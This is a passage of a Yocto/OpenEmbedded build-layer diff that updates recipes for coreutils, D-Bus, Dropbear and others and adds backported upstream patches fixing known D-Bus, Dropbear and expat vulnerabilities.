+-					l++;
+-					pmatch[0].rm_eo++;
+-				}
+ 				n++; /* we saw yet another delimiter */
+ 			} else {
+ 				pmatch[0].rm_eo = l;
+ 				if (s[l])
+ 					pmatch[0].rm_eo++;
+ 			}
+-			memcpy(s1, s, l);
+-			/* make sure we remove *all* of the separator chars */
+-			do {
+-				s1[l] = '\0';
+-			} while (++l < pmatch[0].rm_eo);
+-			nextword(&s1);
++			s1 = mempcpy(s1, s, l);
++			*s1++ = '\0';
+ 			s += pmatch[0].rm_eo;
+ 		} while (*s);
++
++		/* echo a-- | awk -F-- '{ print NF, length($NF), $NF }'
++		 * should print "2 0 ":
++		 */
++		*s1 = '\0';
++
+ 		return n;
+ 	}
+ 	if (c[0] == '\0') {  /* null split */
+@@ -1995,7 +2035,7 @@ static int ptest(node *pattern)
+ static int awk_getline(rstream *rsm, var *v)
+ {
+ 	char *b;
+-	regmatch_t pmatch[2];
++	regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
+ 	int size, a, p, pp = 0;
+ 	int fd, so, eo, r, rp;
+ 	char c, *m, *s;
diff --git a/meta/recipes-core/coreutils/coreutils_8.31.bb b/meta/recipes-core/coreutils/coreutils_8.31.bb
index 0c8452da98..3841f71155 100644
--- a/meta/recipes-core/coreutils/coreutils_8.31.bb
+++ b/meta/recipes-core/coreutils/coreutils_8.31.bb
@@ -26,6 +26,10 @@ SRC_URI_append_libc-musl = "file://strtod_fix_clash_with_strtold.patch"
 SRC_URI[md5sum] = "0009a224d8e288e8ec406ef0161f9293"
 SRC_URI[sha256sum] = "ff7a9c918edce6b4f4b2725e3f9b37b0c4d193531cac49a48b56c4d0d3a9e9fd"
 
+# http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-101-gf5d7c0842
+# runcon is not really a sandbox command, use `runcon ... setsid ...` to avoid this particular issue.
+CVE_CHECK_WHITELIST += "CVE-2016-2781"
+
 EXTRA_OECONF_class-native = "--without-gmp"
 EXTRA_OECONF_class-target = "--enable-install-program=arch,hostname --libexecdir=${libdir}"
 EXTRA_OECONF_class-nativesdk = "--enable-install-program=arch,hostname"
@@ -39,11 +43,15 @@ PACKAGECONFIG_class-target ??= "\
 # The lib/oe/path.py requires xattr
 PACKAGECONFIG_class-native ??= "xattr"
 
+# oe-core builds need xattr support
+PACKAGECONFIG_class-nativesdk ??= "xattr"
+
 # with, without, depends, rdepends
 #
 PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl,"
 PACKAGECONFIG[xattr] = "--enable-xattr,--disable-xattr,attr,"
 PACKAGECONFIG[single-binary] = "--enable-single-binary,--disable-single-binary,,"
+PACKAGECONFIG[openssl] = "--with-openssl=yes,--with-openssl=no,openssl"
 
 # [ df mktemp nice printenv base64 gets a special treatment and is not included in this
 bindir_progs = "arch basename chcon cksum comm csplit cut dir dircolors dirname du \
diff --git a/meta/recipes-core/dbus-wait/dbus-wait_git.bb b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
index c24295b537..b39f7523c0 100644
--- a/meta/recipes-core/dbus-wait/dbus-wait_git.bb
+++ b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "A simple tool to wait for a specific signal over DBus"
 HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/dbus-wait"
+DESCRIPTION = "${SUMMARY}"
 SECTION = "base"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
@@ -10,7 +11,7 @@ SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
 PV = "0.1+git${SRCPV}"
 PR = "r2"
 
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
 UPSTREAM_CHECK_COMMITS = "1"
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/dbus/dbus-test_1.12.16.bb b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
index bea0e74ed0..755c841bad 100644
--- a/meta/recipes-core/dbus/dbus-test_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
@@ -1,57 +1,31 @@
 SUMMARY = "D-Bus test package (for D-bus functionality testing only)"
 HOMEPAGE = "http://dbus.freedesktop.org"
 SECTION = "base"
-LICENSE = "AFL-2.1 | GPLv2+"
-LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
-                    file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
 
-DEPENDS = "dbus glib-2.0"
+require dbus.inc
 
-RDEPENDS_${PN}-dev = ""
+SRC_URI += "file://run-ptest \
+            file://python-config.patch \
+	    "
 
-SRC_URI = "http://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
-           file://tmpdir.patch \
-           file://run-ptest \
-           file://python-config.patch \
-           file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
-           "
+DEPENDS = "dbus glib-2.0"
 
-SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
-SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
+RDEPENDS_${PN}-dev = ""
 
 S="${WORKDIR}/dbus-${PV}"
 FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:"
 
-inherit autotools pkgconfig gettext ptest upstream-version-is-even
+inherit ptest
 
-EXTRA_OECONF_X = "${@bb.utils.contains('DISTRO_FEATURES', 'x11', '--with-x', '--without-x', d)}"
-EXTRA_OECONF_X_class-native = "--without-x"
-
-EXTRA_OECONF = "--enable-tests \
+EXTRA_OECONF += "--enable-tests \
                 --enable-modular-tests \
                 --enable-installed-tests \
                 --enable-checks \
                 --enable-asserts \
-                --enable-largefile \
-                --disable-xml-docs \
-                --disable-doxygen-docs \
-                --disable-libaudit \
                 --with-dbus-test-dir=${PTEST_PATH} \
-                ${EXTRA_OECONF_X} \
                 --enable-embedded-tests \
              "
 
-EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
-
-PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)}"
-PACKAGECONFIG_class-native = ""
-PACKAGECONFIG_class-nativesdk = ""
-
-PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
-PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
-PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
-PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
-
 do_install() {
     :
 }
diff --git a/meta/recipes-core/dbus/dbus.inc b/meta/recipes-core/dbus/dbus.inc
new file mode 100644
index 0000000000..9b5cc53d92
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus.inc
@@ -0,0 +1,36 @@
+inherit autotools pkgconfig gettext upstream-version-is-even
+
+LICENSE = "AFL-2.1 | GPLv2+"
+LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
+                    file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
+
+SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
+           file://tmpdir.patch \
+           file://dbus-1.init \
+           file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
+           file://CVE-2023-34969.patch \
+"
+
+SRC_URI[sha256sum] = "bc42d196c1756ac520d61bf3ccd6f42013617def45dd1e591a6091abf51dca38"
+
+EXTRA_OECONF = "--disable-xml-docs \
+                --disable-doxygen-docs \
+                --disable-libaudit \
+                --enable-largefile \
+                --with-system-socket=/run/dbus/system_bus_socket \
+                "
+EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
+EXTRA_OECONF_append_class-native = " --disable-selinux"
+
+PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
+                   user-session \
+                  "
+PACKAGECONFIG_class-native = ""
+PACKAGECONFIG_class-nativesdk = ""
+
+PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
+PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
+PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
+PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
+
+CVE_PRODUCT += "d-bus_project:d-bus freedesktop:dbus freedesktop:libdbus"
diff --git a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch b/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
deleted file mode 100644
index ac7a4b7a71..0000000000
--- a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From 872b085f12f56da25a2dbd9bd0b2dff31d5aea63 Mon Sep 17 00:00:00 2001
-From: Simon McVittie <smcv@collabora.com>
-Date: Thu, 16 Apr 2020 14:45:11 +0100
-Subject: [PATCH] sysdeps-unix: On MSG_CTRUNC, close the fds we did receive
-
-MSG_CTRUNC indicates that we have received fewer fds that we should
-have done because the buffer was too small, but we were treating it
-as though it indicated that we received *no* fds. If we received any,
-we still have to make sure we close them, otherwise they will be leaked.
-
-On the system bus, if an attacker can induce us to leak fds in this
-way, that's a local denial of service via resource exhaustion.
-
-Reported-by: Kevin Backhouse, GitHub Security Lab
-Fixes: dbus#294
-Fixes: CVE-2020-12049
-Fixes: GHSL-2020-057
-
-Upstream-Status: Backport [https://gitlab.freedesktop.org/dbus/dbus/-/commit/872b085f12f56da25a2dbd9bd0b2dff31d5aea63]
-CVE: CVE-2020-12049
-Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
----
- dbus/dbus-sysdeps-unix.c | 32 ++++++++++++++++++++------------
- 1 file changed, 20 insertions(+), 12 deletions(-)
-
-diff --git a/dbus/dbus-sysdeps-unix.c b/dbus/dbus-sysdeps-unix.c
-index b5fc2466..b176dae1 100644
---- a/dbus/dbus-sysdeps-unix.c
-+++ b/dbus/dbus-sysdeps-unix.c
-@@ -435,18 +435,6 @@ _dbus_read_socket_with_unix_fds (DBusSocket        fd,
-       struct cmsghdr *cm;
-       dbus_bool_t found = FALSE;
- 
--      if (m.msg_flags & MSG_CTRUNC)
--        {
--          /* Hmm, apparently the control data was truncated. The bad
--             thing is that we might have completely lost a couple of fds
--             without chance to recover them. Hence let's treat this as a
--             serious error. */
--
--          errno = ENOSPC;
--          _dbus_string_set_length (buffer, start);
--          return -1;
--        }
--
-       for (cm = CMSG_FIRSTHDR(&m); cm; cm = CMSG_NXTHDR(&m, cm))
-         if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS)
-           {
-@@ -501,6 +489,26 @@ _dbus_read_socket_with_unix_fds (DBusSocket        fd,
-       if (!found)
-         *n_fds = 0;
- 
-+      if (m.msg_flags & MSG_CTRUNC)
-+        {
-+          unsigned int i;
-+
-+          /* Hmm, apparently the control data was truncated. The bad
-+             thing is that we might have completely lost a couple of fds
-+             without chance to recover them. Hence let's treat this as a
-+             serious error. */
-+
-+          /* We still need to close whatever fds we *did* receive,
-+           * otherwise they'll never get closed. (CVE-2020-12049) */
-+          for (i = 0; i < *n_fds; i++)
-+            close (fds[i]);
-+
-+          *n_fds = 0;
-+          errno = ENOSPC;
-+          _dbus_string_set_length (buffer, start);
-+          return -1;
-+        }
-+
-       /* put length back (doesn't actually realloc) */
-       _dbus_string_set_length (buffer, start + bytes_read);
- 
--- 
-2.25.1
-
diff --git a/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
new file mode 100644
index 0000000000..8f29185cf6
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
@@ -0,0 +1,96 @@
+From 37a4dc5835731a1f7a81f1b67c45b8dfb556dd1c Mon Sep 17 00:00:00 2001
+From: hongjinghao <q1204531485@163.com>
+Date: Mon, 5 Jun 2023 18:17:06 +0100
+Subject: [PATCH] bus: Assign a serial number for messages from the driver
+
+Normally, it's enough to rely on a message being given a serial number
+by the DBusConnection just before it is actually sent. However, in the
+rare case where the policy blocks the driver from sending a message
+(due to a deny rule or the outgoing message quota being full), we need
+to get a valid serial number sooner, so that we can copy it into the
+DBUS_HEADER_FIELD_REPLY_SERIAL field (which is mandatory) in the error
+message sent to monitors. Otherwise, the dbus-daemon will crash with
+an assertion failure if at least one Monitoring client is attached,
+because zero is not a valid serial number to copy.
+
+This fixes a denial-of-service vulnerability: if a privileged user is
+monitoring the well-known system bus using a Monitoring client like
+dbus-monitor or `busctl monitor`, then an unprivileged user can cause
+denial-of-service by triggering this crash. A mitigation for this
+vulnerability is to avoid attaching Monitoring clients to the system
+bus when they are not needed. If there are no Monitoring clients, then
+the vulnerable code is not reached.
+
+Co-authored-by: Simon McVittie <smcv@collabora.com>
+Resolves: dbus/dbus#457
+(cherry picked from commit b159849e031000d1dbc1ab876b5fc78a3ce9b534)
+---
+ bus/connection.c                | 15 +++++++++++++++
+ dbus/dbus-connection-internal.h |  2 ++
+ dbus/dbus-connection.c          | 11 ++++++++++-
+ 3 files changed, 27 insertions(+), 1 deletion(-)
+
+diff --git a/bus/connection.c b/bus/connection.c
+index b3583433..215f0230 100644
+--- a/bus/connection.c
++++ b/bus/connection.c
+@@ -2350,6 +2350,21 @@ bus_transaction_send_from_driver (BusTransaction *transaction,
+   if (!dbus_message_set_sender (message, DBUS_SERVICE_DBUS))
+     return FALSE;
+ 
++  /* Make sure the message has a non-zero serial number, otherwise
++   * bus_transaction_capture_error_reply() will not be able to mock up
++   * a corresponding reply for it. Normally this would be delayed until
++   * the first time we actually send the message out from a
++   * connection, when the transaction is committed, but that's too late
++   * in this case.
++   */
++  if (dbus_message_get_serial (message) == 0)
++    {
++      dbus_uint32_t next_serial;
++
++      next_serial = _dbus_connection_get_next_client_serial (connection);
++      dbus_message_set_serial (message, next_serial);
++    }
++
+   if (bus_connection_is_active (connection))
+     {
+       if (!dbus_message_set_destination (message,
+diff --git a/dbus/dbus-connection-internal.h b/dbus/dbus-connection-internal.h
+index 48357321..ba79b192 100644
+--- a/dbus/dbus-connection-internal.h
++++ b/dbus/dbus-connection-internal.h
+@@ -54,6 +54,8 @@ DBUS_PRIVATE_EXPORT
+ DBusConnection *  _dbus_connection_ref_unlocked                (DBusConnection     *connection);
+ DBUS_PRIVATE_EXPORT
+ void              _dbus_connection_unref_unlocked              (DBusConnection     *connection);
++DBUS_PRIVATE_EXPORT
++dbus_uint32_t     _dbus_connection_get_next_client_serial      (DBusConnection *connection);
+ void              _dbus_connection_queue_received_message_link (DBusConnection     *connection,
+                                                                 DBusList           *link);
+ dbus_bool_t       _dbus_connection_has_messages_to_send_unlocked (DBusConnection     *connection);
+diff --git a/dbus/dbus-connection.c b/dbus/dbus-connection.c
+index c525b6dc..09cef278 100644
+--- a/dbus/dbus-connection.c
++++ b/dbus/dbus-connection.c
+@@ -1456,7 +1456,16 @@ _dbus_connection_unref_unlocked (DBusConnection *connection)
+     _dbus_connection_last_unref (connection);
+ }
+ 
+-static dbus_uint32_t
++/**
++ * Allocate and return the next non-zero serial number for outgoing messages.
++ *
++ * This method is only valid to call from single-threaded code, such as
++ * the dbus-daemon, or with the connection lock held.
++ *
++ * @param connection the connection
++ * @returns A suitable serial number for the next message to be sent on the connection.
++ */
++dbus_uint32_t
+ _dbus_connection_get_next_client_serial (DBusConnection *connection)
+ {
+   dbus_uint32_t serial;
+-- 
+2.25.1
+
diff --git a/meta/recipes-core/dbus/dbus_1.12.16.bb b/meta/recipes-core/dbus/dbus_1.12.24.bb
index 10d1b34448..cf6f7dc0ef 100644
--- a/meta/recipes-core/dbus/dbus_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus_1.12.24.bb
@@ -2,9 +2,9 @@ SUMMARY = "D-Bus message bus"
 DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed."
 HOMEPAGE = "https://dbus.freedesktop.org"
 SECTION = "base"
-LICENSE = "AFL-2.1 | GPLv2+"
-LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
-                    file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
+
+require dbus.inc
+
 DEPENDS = "expat virtual/libintl autoconf-archive"
 RDEPENDS_dbus_class-native = ""
 RDEPENDS_dbus_class-nativesdk = ""
@@ -12,17 +12,7 @@ PACKAGES += "${@bb.utils.contains('DISTRO_FEATURES', 'ptest', '${PN}-ptest', '',
 ALLOW_EMPTY_dbus-ptest = "1"
 RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest"
 
-SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
-           file://tmpdir.patch \
-           file://dbus-1.init \
-           file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
-           file://CVE-2020-12049.patch \
-"
-
-SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
-SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
-
-inherit useradd autotools pkgconfig gettext update-rc.d upstream-version-is-even
+inherit useradd update-rc.d
 
 INITSCRIPT_NAME = "dbus-1"
 INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ."
@@ -93,27 +83,7 @@ pkg_postinst_dbus() {
 }
 
 
-EXTRA_OECONF = "--disable-tests \
-                --disable-xml-docs \
-                --disable-doxygen-docs \
-                --disable-libaudit \
-                --enable-largefile \
-                --with-system-socket=/run/dbus/system_bus_socket \
-                "
-
-EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
-EXTRA_OECONF_append_class-native = " --disable-selinux"
-
-PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
-                   user-session \
-                  "
-
-PACKAGECONFIG_class-native = ""
-PACKAGECONFIG_class-nativesdk = ""
-
-PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
-PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
-PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
+EXTRA_OECONF += "--disable-tests"
 
 do_install() {
 	autotools_do_install
diff --git a/meta/recipes-core/dropbear/dropbear.inc b/meta/recipes-core/dropbear/dropbear.inc
index 7269888a4e..0f5e9ba4ac 100644
--- a/meta/recipes-core/dropbear/dropbear.inc
+++ b/meta/recipes-core/dropbear/dropbear.inc
@@ -1,5 +1,6 @@
 SUMMARY = "A lightweight SSH and SCP implementation"
 HOMEPAGE = "http://matt.ucc.asn.au/dropbear/dropbear.html"
+DESCRIPTION = "Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for "embedded"-type Linux (or other Unix) systems, such as wireless routers."
 SECTION = "console/network"
 
 # some files are from other projects and have others license terms:
@@ -11,6 +12,11 @@ DEPENDS = "zlib virtual/crypt"
 RPROVIDES_${PN} = "ssh sshd"
 RCONFLICTS_${PN} = "openssh-sshd openssh"
 
+# break dependency on base package for -dev package
+# otherwise SDK fails to build as the main openssh and dropbear packages
+# conflict with each other
+RDEPENDS:${PN}-dev = ""
+
 DEPENDS += "${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
 
 SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
@@ -21,7 +27,10 @@ SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
            file://dropbear.socket \
            file://dropbear.default \
            ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
-           ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} "
+           ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} \
+           file://CVE-2020-36254.patch \
+           file://CVE-2021-36369.patch \
+           "
 
 PAM_SRC_URI = "file://0005-dropbear-enable-pam.patch \
                file://0006-dropbear-configuration-file.patch \
diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
new file mode 100644
index 0000000000..64d0d96486
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
@@ -0,0 +1,29 @@
+From c96c48d62aefc372f2105293ddf8cff2d116dc3a Mon Sep 17 00:00:00 2001
+From: Haelwenn Monnier <contact+github.com@hacktivis.me>
+Date: Mon, 25 May 2020 14:54:29 +0200
+Subject: [PATCH] scp.c: Port OpenSSH CVE-2018-20685 fix (#80)
+
+Reference:
+https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff
+
+CVE: CVE-2020-36254
+Upstream-Status: Backport
+
+---
+ scp.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/scp.c b/scp.c
+index 742ae00..7b8e7d2 100644
+--- a/scp.c
++++ b/scp.c
+@@ -935,7 +935,8 @@ sink(int argc, char **argv)
+ 			size = size * 10 + (*cp++ - '0');
+ 		if (*cp++ != ' ')
+ 			SCREWUP("size not delimited");
+-		if ((strchr(cp, '/') != NULL) || (strcmp(cp, "..") == 0)) {
++		if (*cp == '\0' || strchr(cp, '/') != NULL ||
++		    strcmp(cp, ".") == 0 || strcmp(cp, "..") == 0) {
+ 			run_err("error: unexpected filename: %s", cp);
+ 			exit(1);
+ 		}
diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
new file mode 100644
index 0000000000..5cabe8339d
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
@@ -0,0 +1,145 @@
+From e10dec82930863e487b22978d3df107274f366b2 Mon Sep 17 00:00:00 2001
+From: Manfred Kaiser <37737811+manfred-kaiser@users.noreply.github.com>
+Date: Thu, 19 Aug 2021 17:37:14 +0200
+Subject: [PATCH] added option to disable trivial auth methods (#128)
+
+* added option to disable trivial auth methods
+
+* rename argument to match with other ssh clients
+
+* fixed trivial auth detection for pubkeys
+
+[https://github.com/mkj/dropbear/pull/128]
+Upstream-Status: Backport
+CVE: CVE-2021-36369
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ cli-auth.c         | 3 +++
+ cli-authinteract.c | 1 +
+ cli-authpasswd.c   | 2 +-
+ cli-authpubkey.c   | 1 +
+ cli-runopts.c      | 7 +++++++
+ cli-session.c      | 1 +
+ runopts.h          | 1 +
+ session.h          | 1 +
+ 8 files changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/cli-auth.c b/cli-auth.c
+index 2e509e5..6f04495 100644
+--- a/cli-auth.c
++++ b/cli-auth.c
+@@ -267,6 +267,9 @@ void recv_msg_userauth_success() {
+ 	if DROPBEAR_CLI_IMMEDIATE_AUTH is set */
+ 
+ 	TRACE(("received msg_userauth_success"))
++	if (cli_opts.disable_trivial_auth && cli_ses.is_trivial_auth) {
++		dropbear_exit("trivial authentication not allowed");
++	}
+ 	/* Note: in delayed-zlib mode, setting authdone here 
+ 	 * will enable compression in the transport layer */
+ 	ses.authstate.authdone = 1;
+diff --git a/cli-authinteract.c b/cli-authinteract.c
+index e1cc9a1..f7128ee 100644
+--- a/cli-authinteract.c
++++ b/cli-authinteract.c
+@@ -114,6 +114,7 @@ void recv_msg_userauth_info_request() {
+ 	m_free(instruction);
+ 
+ 	for (i = 0; i < num_prompts; i++) {
++		cli_ses.is_trivial_auth = 0;
+ 		unsigned int response_len = 0;
+ 		prompt = buf_getstring(ses.payload, NULL);
+ 		cleantext(prompt);
+diff --git a/cli-authpasswd.c b/cli-authpasswd.c
+index 00fdd8b..a24d43e 100644
+--- a/cli-authpasswd.c
++++ b/cli-authpasswd.c
+@@ -155,7 +155,7 @@ void cli_auth_password() {
+ 
+ 	encrypt_packet();
+ 	m_burn(password, strlen(password));
+-
++	cli_ses.is_trivial_auth = 0;
+ 	TRACE(("leave cli_auth_password"))
+ }
+ #endif	/* DROPBEAR_CLI_PASSWORD_AUTH */
+diff --git a/cli-authpubkey.c b/cli-authpubkey.c
+index 7cee164..7da1a04 100644
+--- a/cli-authpubkey.c
++++ b/cli-authpubkey.c
+@@ -174,6 +174,7 @@ static void send_msg_userauth_pubkey(sign_key *key, int type, int realsign) {
+ 		buf_putbytes(sigbuf, ses.writepayload->data, ses.writepayload->len);
+ 		cli_buf_put_sign(ses.writepayload, key, type, sigbuf);
+ 		buf_free(sigbuf); /* Nothing confidential in the buffer */
++		cli_ses.is_trivial_auth = 0;
+ 	}
+ 
+ 	encrypt_packet();
+diff --git a/cli-runopts.c b/cli-runopts.c
+index 7d1fffe..6bf8b8e 100644
+--- a/cli-runopts.c
++++ b/cli-runopts.c
+@@ -152,6 +152,7 @@ void cli_getopts(int argc, char ** argv) {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ 	cli_opts.exit_on_fwd_failure = 0;
+ #endif
++	cli_opts.disable_trivial_auth = 0;
+ #if DROPBEAR_CLI_LOCALTCPFWD
+ 	cli_opts.localfwds = list_new();
+ 	opts.listen_fwd_all = 0;
+@@ -888,6 +889,7 @@ static void add_extendedopt(const char* origstr) {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ 			"\tExitOnForwardFailure\n"
+ #endif
++			"\tDisableTrivialAuth\n"
+ #ifndef DISABLE_SYSLOG
+ 			"\tUseSyslog\n"
+ #endif
+@@ -915,5 +917,10 @@ static void add_extendedopt(const char* origstr) {
+ 		return;
+ 	}
+ 
++	if (match_extendedopt(&optstr, "DisableTrivialAuth") == DROPBEAR_SUCCESS) {
++		cli_opts.disable_trivial_auth = parse_flag_value(optstr);
++		return;
++	}
++
+ 	dropbear_log(LOG_WARNING, "Ignoring unknown configuration option '%s'", origstr);
+ }
+diff --git a/cli-session.c b/cli-session.c
+index 56dd4af..73ef0db 100644
+--- a/cli-session.c
++++ b/cli-session.c
+@@ -164,6 +164,7 @@ static void cli_session_init(pid_t proxy_cmd_pid) {
+ 	/* Auth */
+ 	cli_ses.lastprivkey = NULL;
+ 	cli_ses.lastauthtype = 0;
++	cli_ses.is_trivial_auth = 1;
+ 
+ 	/* For printing "remote host closed" for the user */
+ 	ses.remoteclosed = cli_remoteclosed;
+diff --git a/runopts.h b/runopts.h
+index 31eae1f..8519626 100644
+--- a/runopts.h
++++ b/runopts.h
+@@ -154,6 +154,7 @@ typedef struct cli_runopts {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ 	int exit_on_fwd_failure;
+ #endif
++	int disable_trivial_auth;
+ #if DROPBEAR_CLI_REMOTETCPFWD
+ 	m_list * remotefwds;
+ #endif
+diff --git a/session.h b/session.h
+index 0f77055..8676054 100644
+--- a/session.h
++++ b/session.h
+@@ -287,6 +287,7 @@ struct clientsession {
+ 
+ 	int lastauthtype; /* either AUTH_TYPE_PUBKEY or AUTH_TYPE_PASSWORD,
+ 						 for the last type of auth we tried */
++	int is_trivial_auth;
+ 	int ignore_next_auth_response;
+ #if DROPBEAR_CLI_INTERACT_AUTH
+ 	int auth_interact_failed; /* flag whether interactive auth can still
diff --git a/meta/recipes-core/ell/ell_0.33.bb b/meta/recipes-core/ell/ell_0.33.bb
index 2fa05104fb..bef1e9a0b5 100644
--- a/meta/recipes-core/ell/ell_0.33.bb
+++ b/meta/recipes-core/ell/ell_0.33.bb
@@ -1,4 +1,5 @@
 SUMMARY  = "Embedded Linux Library"
+HOMEPAGE = "https://01.org/ell"
 DESCRIPTION = "The Embedded Linux Library (ELL) provides core, \
 low-level functionality for system daemons. It typically has no \
 dependencies other than the Linux kernel, C standard library, and \
diff --git a/meta/recipes-core/expat/expat/CVE-2013-0340.patch b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
new file mode 100644
index 0000000000..1ab4d06508
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
@@ -0,0 +1,1758 @@
+From a644ccf25392523b1329872310e24d0fc5f40629 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Mon, 19 Apr 2021 21:42:51 +0200
+Subject: [PATCH] expat: Backport fix for CVE-2013-0340
+
+Issue: https://github.com/libexpat/libexpat/issues/34
+
+This patch cherry-picks the following commits from upstream release
+2.4.0 onto 2.2.9:
+
+- b1d039607d3d8a042bf0466bfcc1c0f104e353c8
+- 60959f2b491876199879d97c8ed956eabb0c2e73
+
+Upstream-Status: Backport
+CVE: CVE-2013-0340
+Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
+---
+ lib/expat.h       |   21 +-
+ lib/internal.h    |   30 +
+ lib/libexpat.def  |    3 +
